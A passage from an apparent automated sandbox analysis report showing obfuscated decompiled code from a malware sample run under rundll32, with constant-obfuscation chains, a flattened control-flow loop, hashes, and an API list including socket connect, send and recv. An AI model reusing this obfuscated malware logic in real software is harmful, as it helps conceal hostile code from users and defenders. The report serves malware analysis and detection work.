                                                                                                                      				_v1840 = _v1840 << 0xb;
                                                                                                                      				_v1840 = _v1840 >> 1;
                                                                                                                      				_t612 = 0x47;
                                                                                                                      				_v1840 = _v1840 * 0x27;
                                                                                                                      				_v1840 = _v1840 ^ 0x18b0e4c5;
                                                                                                                      				_v1720 = 0x55473e;
                                                                                                                      				_v1720 = _v1720 >> 0xe;
                                                                                                                      				_v1720 = _v1720 + 0xffff4222;
                                                                                                                      				_v1720 = _v1720 ^ 0xfff7d1f7;
                                                                                                                      				_v1760 = 0x8a22d4;
                                                                                                                      				_v1760 = _v1760 ^ 0x5338d916;
                                                                                                                      				_v1760 = _v1760 / _t612;
                                                                                                                      				_v1760 = _v1760 ^ 0x01221ec9;
                                                                                                                      				_v1716 = 0x7ad7ec;
                                                                                                                      				_v1716 = _v1716 ^ 0xb2734e10;
                                                                                                                      				_v1716 = _v1716 ^ 0xf628ba0e;
                                                                                                                      				_v1716 = _v1716 ^ 0x44287105;
                                                                                                                      				_v1624 = 0x6426f4;
                                                                                                                      				_v1624 = _v1624 * 0x29;
                                                                                                                      				_v1624 = _v1624 ^ 0x100ef306;
                                                                                                                      				_v1728 = 0x3e505e;
                                                                                                                      				_v1728 = _v1728 >> 8;
                                                                                                                      				_t613 = 0x3a;
                                                                                                                      				_v1728 = _v1728 / _t613;
                                                                                                                      				_v1728 = _v1728 ^ 0x00050efb;
                                                                                                                      				_v1752 = 0x3958e2;
                                                                                                                      				_v1752 = _v1752 ^ 0x62ae6d50;
                                                                                                                      				_v1752 = _v1752 ^ 0x97f7befb;
                                                                                                                      				_v1752 = _v1752 ^ 0xf561088c;
                                                                                                                      				_v1688 = 0xb21a91;
                                                                                                                      				_v1688 = _v1688 ^ 0x7ffc0397;
                                                                                                                      				_v1688 = _v1688 ^ 0x7f439e8f;
                                                                                                                      				_v1620 = 0xd8d2d1;
                                                                                                                      				_v1620 = _v1620 + 0x194e;
                                                                                                                      				_v1620 = _v1620 ^ 0x00d523c5;
                                                                                                                      				_v1696 = 0xa820cb;
                                                                                                                      				_v1696 = _v1696 + 0x8b3c;
                                                                                                                      				_v1696 = _v1696 ^ 0x00a28581;
                                                                                                                      				_v1680 = 0x121bc4;
                                                                                                                      				_t674 = 0x7a;
                                                                                                                      				_v1680 = _v1680 / _t674;
                                                                                                                      				_v1680 = _v1680 ^ 0x0006e996;
                                                                                                                      				_v1744 = 0x9924c6;
                                                                                                                      				_v1744 = _v1744 << 4;
                                                                                                                      				_t614 = 0x11;
                                                                                                                      				_v1744 = _v1744 * 0x36;
                                                                                                                      				_v1744 = _v1744 ^ 0x04d385a1;
                                                                                                                      				_v1632 = 0x653a8;
                                                                                                                      				_v1632 = _v1632 * 0x63;
                                                                                                                      				_v1632 = _v1632 ^ 0x027c9a7f;
                                                                                                                      				_v1672 = 0x158278;
                                                                                                                      				_v1672 = _v1672 + 0xffff088d;
                                                                                                                      				_v1672 = _v1672 ^ 0x001491ab;
                                                                                                                      				_v1832 = 0x486b88;
                                                                                                                      				_v1832 = _v1832 + 0xffff9f3d;
                                                                                                                      				_v1832 = _v1832 >> 3;
                                                                                                                      				_v1832 = _v1832 | 0x023d4c2b;
                                                                                                                      				_v1832 = _v1832 ^ 0x0230cd37;
                                                                                                                      				_v1612 = 0xd2c4ef;
                                                                                                                      				_v1612 = _v1612 * 0x5a;
                                                                                                                      				_v1612 = _v1612 ^ 0x4a177333;
                                                                                                                      				_v1776 = 0x829598;
                                                                                                                      				_v1776 = _v1776 << 0xe;
                                                                                                                      				_v1776 = _v1776 >> 2;
                                                                                                                      				_v1776 = _v1776 | 0x8c8c5501;
                                                                                                                      				_v1776 = _v1776 ^ 0xaddb19b6;
                                                                                                                      				_v1712 = 0x169d18;
                                                                                                                      				_v1712 = _v1712 / _t614;
                                                                                                                      				_v1712 = _v1712 >> 0xa;
                                                                                                                      				_v1712 = _v1712 ^ 0x000c26db;
                                                                                                                      				_v1704 = 0xb2b50;
                                                                                                                      				_v1704 = _v1704 ^ 0x2de07b8f;
                                                                                                                      				_v1704 = _v1704 ^ 0x2de0ad86;
                                                                                                                      				_v1800 = 0x9652d5;
                                                                                                                      				_t615 = 3;
                                                                                                                      				_v1800 = _v1800 * 0x68;
                                                                                                                      				_v1800 = _v1800 / _t615;
                                                                                                                      				_v1800 = _v1800 << 0xa;
                                                                                                                      				_v1800 = _v1800 ^ 0x6cd74e85;
                                                                                                                      				_v1664 = 0x74acab;
                                                                                                                      				_v1664 = _v1664 | 0xe18c4dd2;
                                                                                                                      				_v1664 = _v1664 ^ 0xe1f0b032;
                                                                                                                      				_v1824 = 0x58e83b;
                                                                                                                      				_t616 = 0x2c;
                                                                                                                      				_v1824 = _v1824 * 0x2b;
                                                                                                                      				_v1824 = _v1824 + 0xffff56af;
                                                                                                                      				_v1824 = _v1824 ^ 0x0c61ca29;
                                                                                                                      				_v1824 = _v1824 ^ 0x02809c1e;
                                                                                                                      				_v1764 = 0x974237;
                                                                                                                      				_v1764 = _v1764 << 0xb;
                                                                                                                      				_v1764 = _v1764 * 0x31;
                                                                                                                      				_v1764 = _v1764 ^ 0x9d674e65;
                                                                                                                      				_v1736 = 0xc3f98b;
                                                                                                                      				_v1736 = _v1736 * 0x5e;
                                                                                                                      				_v1736 = _v1736 | 0x641bd8e3;
                                                                                                                      				_v1736 = _v1736 ^ 0x67f85735;
                                                                                                                      				_v1700 = 0xe4f15c;
                                                                                                                      				_v1700 = _v1700 | 0xddaa88b0;
                                                                                                                      				_v1700 = _v1700 ^ 0xdde3c6d3;
                                                                                                                      				_v1844 = 0x9b3502;
                                                                                                                      				_v1844 = _v1844 ^ 0x47d60286;
                                                                                                                      				_v1844 = _v1844 / _t616;
                                                                                                                      				_v1844 = _v1844 ^ 0x0193d551;
                                                                                                                      				_v1640 = 0xffe1b1;
                                                                                                                      				_t617 = 0x39;
                                                                                                                      				_v1640 = _v1640 * 0x7b;
                                                                                                                      				_v1640 = _v1640 ^ 0x7af2e2c5;
                                                                                                                      				_v1808 = 0x2876e6;
                                                                                                                      				_v1808 = _v1808 | 0x109585e0;
                                                                                                                      				_v1808 = _v1808 << 0xd;
                                                                                                                      				_v1808 = _v1808 + 0x9cd3;
                                                                                                                      				_v1808 = _v1808 ^ 0xbefbba98;
                                                                                                                      				_v1676 = 0xd3b2e1;
                                                                                                                      				_v1676 = _v1676 << 0xf;
                                                                                                                      				_v1676 = _v1676 ^ 0xd9748eec;
                                                                                                                      				_v1836 = 0x3e007f;
                                                                                                                      				_v1836 = _v1836 + 0xffffe462;
                                                                                                                      				_v1836 = _v1836 >> 9;
                                                                                                                      				_v1836 = _v1836 >> 6;
                                                                                                                      				_v1836 = _v1836 ^ 0x000afa23;
                                                                                                                      				_v1684 = 0x2c402;
                                                                                                                      				_v1684 = _v1684 >> 0xa;
                                                                                                                      				_v1684 = _v1684 ^ 0x0000130c;
                                                                                                                      				_v1692 = 0x94252b;
                                                                                                                      				_v1692 = _v1692 / _t617;
                                                                                                                      				_v1692 = _v1692 ^ 0x000dcb04;
                                                                                                                      				_v1828 = 0xd5c7f6;
                                                                                                                      				_v1828 = _v1828 * 0x41;
                                                                                                                      				_v1828 = _v1828 + 0x5616;
                                                                                                                      				_v1828 = _v1828 >> 9;
                                                                                                                      				_v1828 = _v1828 ^ 0x001e39c7;
                                                                                                                      				_v1740 = 0xceff06;
                                                                                                                      				_v1740 = _v1740 << 0xe;
                                                                                                                      				_v1740 = _v1740 << 8;
                                                                                                                      				_v1740 = _v1740 ^ 0xc18fb5bb;
                                                                                                                      				_v1748 = 0x414330;
                                                                                                                      				_v1748 = _v1748 * 0x1d;
                                                                                                                      				_v1748 = _v1748 | 0x5a6f0d55;
                                                                                                                      				_v1748 = _v1748 ^ 0x5f6ea92a;
                                                                                                                      				_v1668 = 0xd2b255;
                                                                                                                      				_v1668 = _v1668 ^ 0xc5d7949e;
                                                                                                                      				_v1668 = _v1668 ^ 0xc50ba027;
                                                                                                                      				_v1796 = 0xab825d;
                                                                                                                      				_v1796 = _v1796 << 0xc;
                                                                                                                      				_v1796 = _v1796 + 0xd01b;
                                                                                                                      				_t618 = 0x22;
                                                                                                                      				_v1796 = _v1796 / _t618;
                                                                                                                      				_v1796 = _v1796 ^ 0x056bf222;
                                                                                                                      				_v1724 = 0x6f3f31;
                                                                                                                      				_v1724 = _v1724 + 0x5a62;
                                                                                                                      				_v1724 = _v1724 / _t674;
                                                                                                                      				_v1724 = _v1724 ^ 0x0002d040;
                                                                                                                      				_v1652 = 0x230f16;
                                                                                                                      				_v1652 = _v1652 ^ 0x902061d9;
                                                                                                                      				_v1652 = _v1652 ^ 0x9007a9ef;
                                                                                                                      				_v1804 = 0xb250d0;
                                                                                                                      				_v1804 = _v1804 << 7;
                                                                                                                      				_v1804 = _v1804 << 0xe;
                                                                                                                      				_v1804 = _v1804 >> 0x10;
                                                                                                                      				_v1804 = _v1804 ^ 0x000e0b76;
                                                                                                                      				_v1644 = 0x39b2ec;
                                                                                                                      				_v1644 = _v1644 >> 5;
                                                                                                                      				_v1644 = _v1644 ^ 0x0004ae9a;
                                                                                                                      				_v1708 = 0x41b5f8;
                                                                                                                      				_v1708 = _v1708 << 9;
                                                                                                                      				_v1708 = _v1708 + 0xfffffd74;
                                                                                                                      				_v1708 = _v1708 ^ 0x836650ae;
                                                                                                                      				_v1768 = 0xd924a5;
                                                                                                                      				_t619 = 0x26;
                                                                                                                      				_v1768 = _v1768 * 0x57;
                                                                                                                      				_v1768 = _v1768 >> 4;
                                                                                                                      				_v1768 = _v1768 ^ 0x04932b37;
                                                                                                                      				_v1788 = 0x72a9d;
                                                                                                                      				_v1788 = _v1788 >> 0xb;
                                                                                                                      				_v1788 = _v1788 * 0x3f;
                                                                                                                      				_v1788 = _v1788 + 0xffffc8d5;
                                                                                                                      				_v1788 = _v1788 ^ 0x000eb520;
                                                                                                                      				_v1628 = 0x50edf9;
                                                                                                                      				_v1628 = _v1628 * 0x73;
                                                                                                                      				_v1628 = _v1628 ^ 0x245d5801;
                                                                                                                      				_v1772 = 0x77fe3c;
                                                                                                                      				_v1772 = _v1772 + 0x89a9;
                                                                                                                      				_v1772 = _v1772 | 0x772eb6e7;
                                                                                                                      				_v1772 = _v1772 + 0xffffc435;
                                                                                                                      				_v1772 = _v1772 ^ 0x777a10e8;
                                                                                                                      				_v1780 = 0x481950;
                                                                                                                      				_v1780 = _v1780 >> 0xb;
                                                                                                                      				_v1780 = _v1780 | 0x104efd63;
                                                                                                                      				_v1780 = _v1780 + 0xffffd02c;
                                                                                                                      				_v1780 = _v1780 ^ 0x1043876c;
                                                                                                                      				_v1636 = 0x899427;
                                                                                                                      				_v1636 = _v1636 << 0x10;
                                                                                                                      				_v1636 = _v1636 ^ 0x942ef0bd;
                                                                                                                      				_v1812 = 0xafb495;
                                                                                                                      				_v1812 = _v1812 | 0xf73eef3e;
                                                                                                                      				_v1812 = _v1812 + 0xffffb280;
                                                                                                                      				_v1812 = _v1812 ^ 0xf7b4985a;
                                                                                                                      				_v1732 = 0xe6dab0;
                                                                                                                      				_v1732 = _v1732 + 0x38b;
                                                                                                                      				_v1732 = _v1732 | 0x5f912f35;
                                                                                                                      				_v1732 = _v1732 ^ 0x5ff91c81;
                                                                                                                      				_v1660 = 0xa1ff8d;
                                                                                                                      				_v1660 = _v1660 / _t619;
                                                                                                                      				_v1660 = _v1660 ^ 0x000a69c5;
                                                                                                                      				_v1820 = 0xd15a88;
                                                                                                                      				_v1820 = _v1820 ^ 0xcd50b9e8;
                                                                                                                      				_v1820 = _v1820 >> 0x10;
                                                                                                                      				_v1820 = _v1820 ^ 0xf9319330;
                                                                                                                      				_v1820 = _v1820 ^ 0xf933c487;
                                                                                                                      				_t675 = _v1600;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t620 = 0x424d9d2;
                                                                                                                      						do {
                                                                                                                      							L3:
                                                                                                                      							while(_t677 != 0x19ebf08) {
                                                                                                                      								if(_t677 == _t620) {
                                                                                                                      									_push(_v1600);
                                                                                                                      									_push(_v1808);
                                                                                                                      									_t585 = E0069D389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
                                                                                                                      									_t682 =  &(_t682[7]);
                                                                                                                      									__eflags = _t585;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										E00691E67(_v1676, _v1836, _v1684, _v1692, _v1596);
                                                                                                                      										E00691E67(_v1828, _v1740, _v1748, _v1668, _v1592);
                                                                                                                      										_t682 =  &(_t682[6]);
                                                                                                                      									}
                                                                                                                      									L14:
                                                                                                                      									_t677 = 0x19ebf08;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										L2:
                                                                                                                      										_t620 = 0x424d9d2;
                                                                                                                      										goto L3;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								if(_t677 == 0x5bc69f5) {
                                                                                                                      									_t592 = E0069D2CE(_t620);
                                                                                                                      									__eflags = _t592 - E00683DE2(_t620);
                                                                                                                      									_t583 = 0x7574965;
                                                                                                                      									_t677 = 0x8166b1d;
                                                                                                                      									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      								if(_t677 == 0x8166b1d) {
                                                                                                                      									__eflags = _t675 - _t583;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t677 = 0xd369ee2;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      									_push(_t620);
                                                                                                                      									_push(_t620);
                                                                                                                      									_t606 = E0069BB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
                                                                                                                      									_t682 =  &(_t682[6]);
                                                                                                                      									__eflags = _t606;
                                                                                                                      									if(__eflags == 0) {
                                                                                                                      										L12:
                                                                                                                      										return _t606;
                                                                                                                      									}
                                                                                                                      									_t677 = 0xd369ee2;
                                                                                                                      									goto L1;
                                                                                                                      								}
                                                                                                                      								if(_t677 == 0xb42e112) {
                                                                                                                      									_t677 = 0x5bc69f5;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								if(_t677 == 0xd369ee2) {
                                                                                                                      									E0069DA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
                                                                                                                      									 *((short*)(E0068B6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
                                                                                                                      									E00688969(_v1688,  &_v524, __eflags, _v1620, _v1696);
                                                                                                                      									_push(_v1632);
                                                                                                                      									_push(_v1744);
                                                                                                                      									E006847CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E0069DCF7(_v1680, 0x681328, __eflags),  &_v524, _v1776, _v1712);
                                                                                                                      									E0068A8B0(_v1704, _t598, _v1800);
                                                                                                                      									_t603 = E0068EA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
                                                                                                                      									_t682 =  &(_t682[0x17]);
                                                                                                                      									__eflags = _t603;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t583 = 0x7574965;
                                                                                                                      										__eflags = _t675 - 0x7574965;
                                                                                                                      										_t620 = 0x424d9d2;
                                                                                                                      										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      									goto L14;
                                                                                                                      								}
                                                                                                                      								_t696 = _t677 - 0xe2e667c;
                                                                                                                      								if(_t677 != 0xe2e667c) {
                                                                                                                      									goto L25;
                                                                                                                      								}
                                                                                                                      								_push(_v1804);
                                                                                                                      								_push( &_v1564);
                                                                                                                      								_push(_t620);
                                                                                                                      								_push(0);
                                                                                                                      								_push( &_v1596);
                                                                                                                      								_push(_v1652);
                                                                                                                      								_push(0);
                                                                                                                      								_t606 = E0068AB87(_v1796, _v1724, _t696);
                                                                                                                      								if(_t606 == 0) {
                                                                                                                      									goto L12;
                                                                                                                      								}
                                                                                                                      								E00691E67(_v1644, _v1708, _v1768, _v1788, _v1596);
                                                                                                                      								return E00691E67(_v1628, _v1772, _v1780, _v1636, _v1592);
                                                                                                                      							}
                                                                                                                      							E00691E67(_v1812, _v1732, _v1660, _v1820, _v1600);
                                                                                                                      							_t682 =  &(_t682[3]);
                                                                                                                      							_t677 = 0xe6feec1;
                                                                                                                      							_t583 = 0x7574965;
                                                                                                                      							_t620 = 0x424d9d2;
                                                                                                                      							L25:
                                                                                                                      							__eflags = _t677 - 0xe6feec1;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						return _t583;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x00696f96
                                                                                                                      0x00696fa1
                                                                                                                      0x00696fa9
                                                                                                                      0x00696fb4
                                                                                                                      0x00696fbf
                                                                                                                      0x00696fc7
                                                                                                                      0x00696fd5
                                                                                                                      0x00696fd9
                                                                                                                      0x00696fe1
                                                                                                                      0x00696fec
                                                                                                                      0x00696ff7
                                                                                                                      0x00697002
                                                                                                                      0x0069700d
                                                                                                                      0x00697020
                                                                                                                      0x00697027
                                                                                                                      0x00697032
                                                                                                                      0x0069703d
                                                                                                                      0x00697050
                                                                                                                      0x00697055
                                                                                                                      0x0069705e
                                                                                                                      0x00697069
                                                                                                                      0x00697071
                                                                                                                      0x00697079
                                                                                                                      0x00697081
                                                                                                                      0x00697089
                                                                                                                      0x00697094
                                                                                                                      0x0069709f
                                                                                                                      0x006970aa
                                                                                                                      0x006970b5
                                                                                                                      0x006970c0
                                                                                                                      0x006970cb
                                                                                                                      0x006970d6
                                                                                                                      0x006970e1
                                                                                                                      0x006970ec
                                                                                                                      0x006970fe
                                                                                                                      0x00697103
                                                                                                                      0x0069710c
                                                                                                                      0x00697117
                                                                                                                      0x0069711f
                                                                                                                      0x00697129
                                                                                                                      0x0069712c
                                                                                                                      0x00697130
                                                                                                                      0x00697138
                                                                                                                      0x0069714b
                                                                                                                      0x00697152
                                                                                                                      0x0069715d
                                                                                                                      0x00697168
                                                                                                                      0x00697173
                                                                                                                      0x0069717e
                                                                                                                      0x00697186
                                                                                                                      0x0069718e
                                                                                                                      0x00697193
                                                                                                                      0x0069719b
                                                                                                                      0x006971a3
                                                                                                                      0x006971b6
                                                                                                                      0x006971bd
                                                                                                                      0x006971c8
                                                                                                                      0x006971d0
                                                                                                                      0x006971d5
                                                                                                                      0x006971da
                                                                                                                      0x006971e2
                                                                                                                      0x006971ea
                                                                                                                      0x00697200
                                                                                                                      0x00697207
                                                                                                                      0x0069720f
                                                                                                                      0x0069721a
                                                                                                                      0x00697225
                                                                                                                      0x00697230
                                                                                                                      0x0069723b
                                                                                                                      0x00697248
                                                                                                                      0x00697249
                                                                                                                      0x00697253
                                                                                                                      0x00697257
                                                                                                                      0x0069725c
                                                                                                                      0x00697264
                                                                                                                      0x0069726f
                                                                                                                      0x0069727a
                                                                                                                      0x00697285
                                                                                                                      0x00697296
                                                                                                                      0x00697299
                                                                                                                      0x0069729d
                                                                                                                      0x006972a5
                                                                                                                      0x006972ad
                                                                                                                      0x006972b5
                                                                                                                      0x006972bd
                                                                                                                      0x006972c7
                                                                                                                      0x006972cb
                                                                                                                      0x006972d3
                                                                                                                      0x006972e6
                                                                                                                      0x006972ed
                                                                                                                      0x006972f8
                                                                                                                      0x00697303
                                                                                                                      0x0069730e
                                                                                                                      0x00697319
                                                                                                                      0x00697324
                                                                                                                      0x0069732c
                                                                                                                      0x00697344
                                                                                                                      0x00697348
                                                                                                                      0x00697350
                                                                                                                      0x00697363
                                                                                                                      0x00697366
                                                                                                                      0x0069736d
                                                                                                                      0x00697378
                                                                                                                      0x00697380
                                                                                                                      0x00697388
                                                                                                                      0x0069738d
                                                                                                                      0x00697395
                                                                                                                      0x0069739d
                                                                                                                      0x006973a8
                                                                                                                      0x006973b0
                                                                                                                      0x006973bb
                                                                                                                      0x006973c3
                                                                                                                      0x006973cb
                                                                                                                      0x006973d0
                                                                                                                      0x006973d5
                                                                                                                      0x006973dd
                                                                                                                      0x006973e8
                                                                                                                      0x006973f0
                                                                                                                      0x006973fb
                                                                                                                      0x0069740f
                                                                                                                      0x00697416
                                                                                                                      0x00697421
                                                                                                                      0x0069742e
                                                                                                                      0x00697432
                                                                                                                      0x0069743a
                                                                                                                      0x0069743f
                                                                                                                      0x00697447
                                                                                                                      0x0069744f
                                                                                                                      0x00697454
                                                                                                                      0x00697459
                                                                                                                      0x00697461
                                                                                                                      0x0069746e
                                                                                                                      0x00697472
                                                                                                                      0x0069747a
                                                                                                                      0x00697482
                                                                                                                      0x0069748d
                                                                                                                      0x00697498
                                                                                                                      0x006974a3
                                                                                                                      0x006974ab
                                                                                                                      0x006974b0
                                                                                                                      0x006974be
                                                                                                                      0x006974c8
                                                                                                                      0x006974cc
                                                                                                                      0x006974d4
                                                                                                                      0x006974df
                                                                                                                      0x006974f5
                                                                                                                      0x006974fe
                                                                                                                      0x00697509
                                                                                                                      0x00697514
                                                                                                                      0x0069751f
                                                                                                                      0x0069752a
                                                                                                                      0x00697532
                                                                                                                      0x00697537
                                                                                                                      0x0069753c
                                                                                                                      0x00697541
                                                                                                                      0x00697549
                                                                                                                      0x00697554
                                                                                                                      0x0069755c
                                                                                                                      0x00697567
                                                                                                                      0x00697572
                                                                                                                      0x0069757a
                                                                                                                      0x00697585
                                                                                                                      0x00697590
                                                                                                                      0x0069759d
                                                                                                                      0x0069759e
                                                                                                                      0x006975a2
                                                                                                                      0x006975a7
                                                                                                                      0x006975af
                                                                                                                      0x006975b7
                                                                                                                      0x006975c1
                                                                                                                      0x006975c5
                                                                                                                      0x006975cd
                                                                                                                      0x006975d5
                                                                                                                      0x006975e8
                                                                                                                      0x006975ef
                                                                                                                      0x006975fa
                                                                                                                      0x00697602
                                                                                                                      0x0069760a
                                                                                                                      0x00697612
                                                                                                                      0x0069761a
                                                                                                                      0x00697622
                                                                                                                      0x0069762a
                                                                                                                      0x0069762f
                                                                                                                      0x00697637
                                                                                                                      0x0069763f
                                                                                                                      0x00697647
                                                                                                                      0x00697652
                                                                                                                      0x0069765a
                                                                                                                      0x00697665
                                                                                                                      0x0069766d
                                                                                                                      0x00697675
                                                                                                                      0x0069767d
                                                                                                                      0x00697685
                                                                                                                      0x00697690
                                                                                                                      0x0069769b
                                                                                                                      0x006976a6
                                                                                                                      0x006976b1
                                                                                                                      0x006976c5
                                                                                                                      0x006976cc
                                                                                                                      0x006976d7
                                                                                                                      0x006976df
                                                                                                                      0x006976e7
                                                                                                                      0x006976ec
                                                                                                                      0x006976f4
                                                                                                                      0x006976fc
                                                                                                                      0x00697703
                                                                                                                      0x00697703
                                                                                                                      0x00697708
                                                                                                                      0x00697708
                                                                                                                      0x00697708
                                                                                                                      0x0069770d
                                                                                                                      0x00000000
                                                                                                                      0x0069770d
                                                                                                                      0x00697717
                                                                                                                      0x0069799c
                                                                                                                      0x006979aa
                                                                                                                      0x006979ca

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
                                                                                                                      • API String ID: 0-2206596976
                                                                                                                      • Opcode ID: 09816bc3c1c62b05e510fa23086c62f0d6b02506cbfae4b7e85db321126d79a0
                                                                                                                      • Instruction ID: e2e5a158808e940e23a93387daa76d7e4df807a7c0634e554df0326cf342ecc3
                                                                                                                      • Opcode Fuzzy Hash: 09816bc3c1c62b05e510fa23086c62f0d6b02506cbfae4b7e85db321126d79a0
                                                                                                                      • Instruction Fuzzy Hash: A352FE715083818BD7B8CF61C54AB9FBBE2BBC4308F108A1DE5DA96260D7B18949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 10012C6C
                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                      • _strcat.LIBCMT ref: 10012CE9
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                      • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                        • Part of subcall function 1001DD46: GetDlgItem.USER32(?,CD5FCEB9), ref: 1001DD53
                                                                                                                        • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                      • String ID: Connected$Disconnected$Wait...
                                                                                                                      • API String ID: 2263617321-2304371739
                                                                                                                      • Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                      • Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
                                                                                                                      • Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                      • Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00682251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				void* _t323;
                                                                                                                      				signed int _t369;
                                                                                                                      				signed int _t371;
                                                                                                                      				signed int _t372;
                                                                                                                      				signed int _t373;
                                                                                                                      				signed int _t374;
                                                                                                                      				signed int _t375;
                                                                                                                      				signed int _t376;
                                                                                                                      				signed int _t377;
                                                                                                                      				signed int _t378;
                                                                                                                      				signed int _t379;
                                                                                                                      				void* _t382;
                                                                                                                      				signed int* _t424;
                                                                                                                      				void* _t427;
                                                                                                                      				void* _t428;
                                                                                                                      				void* _t431;
                                                                                                                      
                                                                                                                      				_t425 = _a4;
                                                                                                                      				_push(_a12);
                                                                                                                      				_t424 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t323);
                                                                                                                      				_v104 = 0xfd7ba2;
                                                                                                                      				_t428 = _t427 + 0x14;
                                                                                                                      				_v104 = _v104 << 2;
                                                                                                                      				_v104 = _v104 ^ 0x03f5ee88;
                                                                                                                      				_t382 = 0x3e8dc94;
                                                                                                                      				_v112 = 0x53a35e;
                                                                                                                      				_t371 = 0x1c;
                                                                                                                      				_v112 = _v112 / _t371;
                                                                                                                      				_v112 = _v112 << 0xb;
                                                                                                                      				_v112 = _v112 ^ 0x17ec1018;
                                                                                                                      				_v100 = 0x45b9a1;
                                                                                                                      				_v100 = _v100 + 0xffff7cfc;
                                                                                                                      				_v100 = _v100 ^ 0x004aa95b;
                                                                                                                      				_v92 = 0xd93693;
                                                                                                                      				_v92 = _v92 + 0xb87a;
